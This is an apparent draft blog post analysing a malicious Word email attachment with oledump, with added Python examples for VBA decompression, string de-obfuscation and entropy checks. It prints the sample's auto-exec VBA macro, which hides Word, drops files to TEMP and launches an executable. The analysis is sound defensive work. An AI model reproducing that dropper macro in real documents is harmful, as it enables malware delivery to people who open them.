Secure DOC Email Malware
draft post, needs more links and images
I spent a few pleasant hours today puzzling over a malware sample I received in email this week. Attached to a message from a bank I don’t do any business with was a Word document whose contents proclaim it holds an important secret message that can only be seen if macros are enabled. I was hooked, for the malware undoubtedly within!
Along the way I found out about and devoured a video workshop from Didier Stevens, who makes the tools I was using. So, allow me to plug his firm DSL and the first malicious documents workshop.
ETA 16 Nov: Lots of very smart people did analysis on other samples from this campaign. I read some really good stuff about it later on a closed list, and these are public:
DSL’s oledump tool was very helpful in digging into the file. In fact I was fighting with the random variable names of the macro code for a while before I thought to hash and look up my sample. Here are those links:
VirusTotal detection rate is pretty good now. I got my sample in the mail Wednesday 21 Oct. VT analysis
The public Cuckoo Sandbox instance at Malwr has some good details, including some dropped files info in their results
This MyOnlineSecurity post describes the campaign and related risks, and includes some screenshots of the doc as opened in MS Office.
```
$ ls -lh Secure\ Message.doc
-rw-r--r-- 1 adric adric 73K Oct 21 13:08 Secure Message.doc
$ md5sum Secure\ Message.doc
e801337581de7c8b4e887a3f8f0944b3  Secure Message.doc
$ file Secure\ Message.doc
Secure Message.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 21 21:12:00 2015, Last Saved Time/Date: Wed Oct 21 17:23:00 2015, Number of Pages: 1, Number of Words: 535, Number of Characters: 3051, Security: 0
$ gstat Secure\ Message.doc
  File: ‘Secure Message.doc’
  Size: 74752      Blocks: 152        IO Block: 4096   regular file
Device: 1000002h/16777218d  Inode: 94755058    Links: 1
Access: (0644/-rw-r--r--)  Uid: (  502/   adric)   Gid: (   20/   staff)
Access: 2015-10-23 19:25:30.000000000 -0400
Modify: 2015-10-21 13:08:31.000000000 -0400
Change: 2015-10-21 13:08:31.000000000 -0400
 Birth: 2015-10-21 13:08:31.000000000 -0400
```
I did throw the sample at my local Cuckoo instance here in the home lab, but my victim virtual machine(s) don’t have winword (MS Office) so they couldn’t do anything with it.
DSL tools are available from Didier’s [website](http://blog.didierstevens.com/), are included in REMnux, and come with the workshop as well.
A basic run of the tool lists the streams of the Office file and calls out the macros for us with an M for functional macro code:
```
$ /opt/remnux-didier/oledump.py Secure\ Message.doc
  1:       121 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9365 '1Table'
  5:      4096 'Data'
  6:       440 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    4797 'Macros/VBA/ThisDocument'
  9:      2765 'Macros/VBA/_VBA_PROJECT'
 10:       515 'Macros/VBA/dir'
 11:       205 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Item'
 12:       341 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Properties'
 13:     37482 'WordDocument'
```
We can isolate, decompress and export a stream like so:
```
$ /opt/remnux-didier/oledump.py -s 8 -v "Secure Message.doc" > macro
```
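The `-v` above is doing real work: VBA source in the `Macros/VBA/*` streams is stored in the MS-OVBA "VBA compression" format (a signature byte 0x01 followed by 4 KB chunks of LZ77-style literal and copy tokens), so the raw stream is not greppable until it is decompressed. The following is an added example, not part of this post and not DSL's code, that implements that decompression from the MS-OVBA description, plus a small greedy compressor used only to build test data offline; the byte layout of the hand-built test vector in the comments is mine.

```python
# Added example: MS-OVBA "VBA compression" decoder (what oledump -v applies to a
# Macros/VBA/* stream), with a tiny encoder so it can be exercised without a sample.

def _copy_token_bits(pos_in_chunk):
    """Offset bit width of a copy token, per MS-OVBA: max(ceil(log2(pos)), 4)."""
    bits = 4
    while (1 << bits) < pos_in_chunk:
        bits += 1
    return bits


def decompress_vba(data):
    """Decompress a container: 0x01 signature, then chunks with a 16-bit header each."""
    if not data or data[0] != 0x01:
        raise ValueError("missing MS-OVBA signature byte 0x01")
    out = bytearray()
    i = 1
    while i + 2 <= len(data):
        header = int.from_bytes(data[i:i + 2], "little")
        i += 2
        chunk_size = (header & 0x0FFF) + 3          # size field = total size - 3
        if (header >> 12) & 0x7 != 0b011:           # bits 12..14 must be 0b011
            raise ValueError("bad chunk signature at offset %d" % (i - 2))
        compressed = header >> 15                   # bit 15: 1 = token stream, 0 = raw
        chunk_end = min(i + chunk_size - 2, len(data))
        chunk_start = len(out)                      # copy offsets are chunk-relative
        if not compressed:                          # raw chunk: literal bytes
            out += data[i:chunk_end]
            i = chunk_end
            continue
        while i < chunk_end:
            flags = data[i]                         # one flag byte governs 8 tokens
            i += 1
            for bit in range(8):
                if i >= chunk_end:
                    break
                if not (flags >> bit) & 1:          # 0: literal, one byte
                    out.append(data[i])
                    i += 1
                else:                               # 1: copy token, 16-bit offset/length
                    token = int.from_bytes(data[i:i + 2], "little")
                    i += 2
                    bits = _copy_token_bits(len(out) - chunk_start)
                    length = (token & (0xFFFF >> bits)) + 3
                    offset = (token >> (16 - bits)) + 1
                    src = len(out) - offset
                    for k in range(length):         # byte-wise so overlapping copies work
                        out.append(out[src + k])
        i = chunk_end
    return bytes(out)


def compress_vba(data):
    """Greedy encoder producing a container decompress_vba() accepts (test helper)."""
    out = bytearray([0x01])
    for start in range(0, len(data), 4096):
        chunk = data[start:start + 4096]
        body = bytearray()
        pos = 0
        while pos < len(chunk):
            flags, tokens = 0, bytearray()
            for bit in range(8):
                if pos >= len(chunk):
                    break
                bits = _copy_token_bits(pos)
                max_len = (0xFFFF >> bits) + 3
                max_off = 1 << (16 - bits)
                best_len, best_off = 0, 0
                for off in range(1, min(pos, max_off) + 1):
                    n = 0
                    while (n < max_len and pos + n < len(chunk)
                           and chunk[pos + n] == chunk[pos + n - off]):
                        n += 1
                    if n > best_len:
                        best_len, best_off = n, off
                if best_len >= 3:
                    flags |= 1 << bit
                    token = ((best_off - 1) << (16 - bits)) | (best_len - 3)
                    tokens += token.to_bytes(2, "little")
                    pos += best_len
                else:
                    tokens.append(chunk[pos])
                    pos += 1
            body.append(flags)
            body += tokens
        if len(body) > 4096:                        # incompressible: emit a raw chunk
            body = bytearray(chunk.ljust(4096, b"\x00"))
            header = 0x3000 | 0x0FFF
        else:
            header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
        out += header.to_bytes(2, "little") + body
    return bytes(out)


# Hand-built vector (constructed): "abcabcabcabc" = literals a,b,c then one copy token
# (offset 3, length 9). Flag byte 0x08, token 0x2006, header 0xB005 (compressed, size 8).
VECTOR = bytes.fromhex("0105b0086162630620")
```

Run `decompress_vba(VECTOR)` to see the 12-byte string come back, or `decompress_vba(compress_vba(open("macro.bin","rb").read()))` against a stream you exported with `-s 8` and no `-v` to confirm the two agree with oledump's output. Note that copy-token offsets are measured inside the current 4 KB chunk, which is why `chunk_start` is tracked separately.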
This macro is obfuscated in a couple of ways, including all of the variable and function names being noisy goo and some use of extra variables and concatenation. Here are a few lines, slightly altered as an example:
```vba
Sub AutoOpen()
    YQGDJHASDB = "q,jwdlk XXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open
End Sub

Sub Ljqhdsd()
    KAHDJKASND = "askdhjk ashdjk asghXXXXXXXXXXXX"
    Subipose
End Sub
```
I fussed over the code of this macro for quite a while, renaming things to make some sense of it. Here’s my version, with my notes as comments:
```vba
' main for Word
Sub AutoOpen()
    varY = "q,jwdlk XXXXXXXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open   ' run main for Excel
End Sub

' orphan?
Sub LK()
    varK = "askdhjk ashdjk asghXXXXXXXXXXXX"
    main
End Sub

Sub main()
    slash = "\"
    Temp = "TEMP"
    On Error Resume Next
    TMP = Environ$(Temp) & slash
    FEFE = ".e"
    FEFE = FEFE & "xe"
    DEDE = "." + "rt" + "f"
    TCA = TMP + "322" + DEDE        ' $TEMP\322.rtf
    TCB = TMP + "311" + DEDE        ' $TEMP\311.rtf
    TEX = TMP + "w18" & "" + FEFE   ' $TEMP\w18.exe
    ' save RTFs to disk
    SaveFile (TCA)
    SaveFile (TCB)
    ' sleep?
    Sleep (2)
    ' Run Word
    Set wordObj = CreateObject("Word.Application")
    wordObj.Visible = False
    Set frame = wordObj.Documents.Open(TCA)   ' create another Word window with 322.rtf, hide it
    ' sleep and then exec
    Sleep (2)
    Shell (TEX)   ' run $Temp\w18.exe
    Sleep (1)
    ' stop other Word
    wordObj.Quit
    Set wordObj = Nothing   ' kill Word
End Sub

' for Excel
Sub Workbook_Open()
    varX = "ansdh XXXXXXXXXXXXXXXX d"
    main
End Sub

' Sleep == sleep(secs)?
Sub Sleep(duration As Long)
    Dim Counter As Long
    Counter = Timer + duration
    Do While Timer < Counter
        DoEvents
    Loop
End Sub

' Save File As RTF?
Public Function SaveFile(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function

' main for Excel
Sub Auto_Open()
    main
    varB = "qkwdhj XXXXXXXXXXXXXXXXd"
End Sub
```
What I think it does: when the document is opened in Word or Excel it auto-executes the main function, which saves the document to disk as two temp files, using Word to convert to RTF ( $TEMP\322.rtf , $TEMP\311.rtf ). Another hidden Word window is opened on one of those files ( $TEMP\322.rtf ), and then a third file ( $TEMP\w18.exe ) is executed.
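The manual renaming above is the tedious part; the string-building obfuscation (split literals, `&`/`+` concatenation, `Environ$` lookups) is mechanical enough to fold automatically. The following is an added example, not code from this post or from DSL, that walks the macro line by line, evaluates every assignment whose right-hand side is only literals and already-known variables, and separately lists the auto-exec entry points and API calls that make a macro worth a second look. The sample macro embedded in it is an abbreviated copy of the renamed version above; `%TEMP%` is a placeholder I substitute for the environment lookup, since the real value only exists on the victim machine.

```python
import re

# Added example: fold concatenated string literals in a VBA macro and flag triage keywords.

# Constructed sample: abbreviated from the renamed macro in the post.
SAMPLE_VBA = r'''
Sub AutoOpen()
    varY = "q,jwdlk XXXXXXXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open
End Sub

Sub main()
    slash = "\"
    Temp = "TEMP"
    On Error Resume Next
    TMP = Environ$(Temp) & slash
    FEFE = ".e"
    FEFE = FEFE & "xe"
    DEDE = "." + "rt" + "f"
    TCA = TMP + "322" + DEDE
    TCB = TMP + "311" + DEDE
    TEX = TMP + "w18" & "" + FEFE
    SaveFile (TCA)
    SaveFile (TCB)
    Set wordObj = CreateObject("Word.Application")
    wordObj.Visible = False
    Set frame = wordObj.Documents.Open(TCA)
    Shell (TEX)
    wordObj.Quit
End Sub

Sub Workbook_Open()
    main
End Sub

Public Function SaveFile(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
'''

# Auto-execution hooks and calls that deserve attention in triage (not an exhaustive list).
AUTOEXEC = ("AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open")
SUSPICIOUS = ("Shell", "CreateObject", "Environ", "SaveAs", ".Visible = False")

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
TOKEN_RE = re.compile(
    r'"([^"]*)"'                   # 1: string literal
    r"|Environ\$?\s*\(([^)]*)\)"   # 2: Environ(...) lookup
    r"|([A-Za-z_]\w*)"             # 3: identifier
    r"|([&+])"                     # 4: concatenation operator (ignored)
)


def _strip_comment(line):
    # Assumes no apostrophes inside string literals (true for this sample).
    return line.split("'", 1)[0]


def _eval(expr, env):
    """Concatenate literals and already-known variables; None if anything is unknown."""
    parts = []
    for m in TOKEN_RE.finditer(expr):
        if m.lastindex == 1:
            parts.append(m.group(1))
        elif m.lastindex == 2:
            name = _eval(m.group(2), env)
            if name is None:
                return None
            parts.append("%" + name + "%")   # placeholder for the victim's env value
        elif m.lastindex == 3:
            value = env.get(m.group(3).lower())   # VBA names are case-insensitive
            if value is None:
                return None
            parts.append(value)
    return "".join(parts) if parts else None


def resolve_strings(vba_src):
    """Return {variable (lower-case): resolved string} for every assignment we could fold."""
    env = {}
    for line in vba_src.splitlines():
        m = ASSIGN_RE.match(_strip_comment(line))
        if not m:
            continue
        value = _eval(m.group(2), env)
        if value is not None:
            env[m.group(1).lower()] = value
    return env


def scan_indicators(vba_src):
    """Return (line_no, keyword) pairs for auto-exec hooks and suspicious calls."""
    hits = []
    for no, line in enumerate(vba_src.splitlines(), 1):
        code = _strip_comment(line).lower()
        hits += [(no, kw) for kw in AUTOEXEC + SUSPICIOUS if kw.lower() in code]
    return hits
```

`resolve_strings(SAMPLE_VBA)` gives `tex` as `%TEMP%\w18.exe` and `tca` as `%TEMP%\322.rtf`, which is the result of the renaming pass in one call; `scan_indicators` lists the AutoOpen/Workbook_Open hooks and the Shell, CreateObject and SaveAs lines. It is deliberately a single-pass constant folder: anything involving arithmetic, function calls other than Environ, or reassignment inside loops stays unresolved rather than guessed.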
Checking back with the dynamic analysis from Malwr, we see the 311 and 322 files dropped, along with some other possible dropped files. 311 and 322 are slightly different sizes, but 10 times larger than our specimen, at 771826 and 771821 bytes. A third large file in Malwr is office.odf, which is ~2.3 MB. VirusTotal for that indicates that it is a signed part of MS Office (“Microsoft Office culture data dll”), so it may be an artifact of the sandbox that isn’t relevant to the malware activity.
I think Malwr’s system wasn’t vulnerable, so they didn’t get the payload. My hypothesis is that something in the Office doc can exploit Word when it is written out as RTF and then read back in.
The Word DOC contents include a note about an encrypted message (“A message is encrypted by RSA key.”) and an impressive-looking block of noise marked as RSA encrypted and delimited by “—–RSA PROTECTED BLOCK—–” markers.
I pulled out the data block with oledump and trimmed with vi:
```
$ /opt/remnux-didier/oledump.py -s13 --cut '0x900:0x15c0' -d Secure\ Message.doc > q; vi q
```
I can’t make anything of it yet, despite trying a few basic decoding tricks. It’s pretty random, according to chi-squared analysis with DensityScout (in REMnux):
```
$ densityscout -m CHI q
DensityScout (Build 43) by Christian Wojner

Calculating density for file ...

(Density) | Filename
--------------------------------------------------------------
(42.4244) | q
```
Maybe it really is encrypted with an RSA cipher, and some of the noise in the macro is key material?
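For readers who want to reproduce the "is this blob random?" check without DensityScout, here is an added example of the two usual byte-distribution measures. It is my code, not the post's and not DensityScout's (whose density score is its own measure), and its inputs are constructed: a seeded pseudo-random buffer standing in for ciphertext and some repeated prose standing in for the document body. The critical value of roughly 310 is the approximate 0.99 quantile of the chi-square distribution with 255 degrees of freedom.

```python
import math
import random

# Added example: Shannon entropy and chi-square-against-uniform of a byte histogram,
# the two quick sanity checks for "encrypted/compressed vs structured" data.


def byte_counts(data):
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return counts


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant stream, 8.0 for a perfectly flat histogram."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in byte_counts(data) if c)


def chi_square(data):
    """Chi-square statistic of the byte histogram against a uniform expectation (255 df)."""
    n = len(data)
    if n == 0:
        return 0.0
    expected = n / 256
    return sum((c - expected) ** 2 / expected for c in byte_counts(data))


def classify(data, crit=310.0):
    """Crude label; crit ~310 is the approximate chi-square 0.99 quantile for 255 df."""
    if chi_square(data) < crit:
        return "consistent with random/encrypted"
    return "structured (text, code, encoding)"


# Constructed inputs (not taken from the sample).
_rng = random.Random(2015)
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(65536))
PROSE = b"A message is encrypted by RSA key. Enable macros to view the content. " * 400


def report(name, data):
    return "%-12s entropy=%.3f chi2=%.1f  %s" % (
        name, shannon_entropy(data), chi_square(data), classify(data))


if __name__ == "__main__":
    print(report("random", RANDOM_BLOB))
    print(report("prose", PROSE))
```

Two caveats a practitioner should keep in mind: a short buffer (a few hundred bytes) cannot score well on either measure whatever its origin, so the sizes matter; and Base64 or hex text of random data scores as "structured" because only 64 or 16 byte values occur, which is exactly the kind of "basic decoding trick" worth trying before concluding the block is ciphertext.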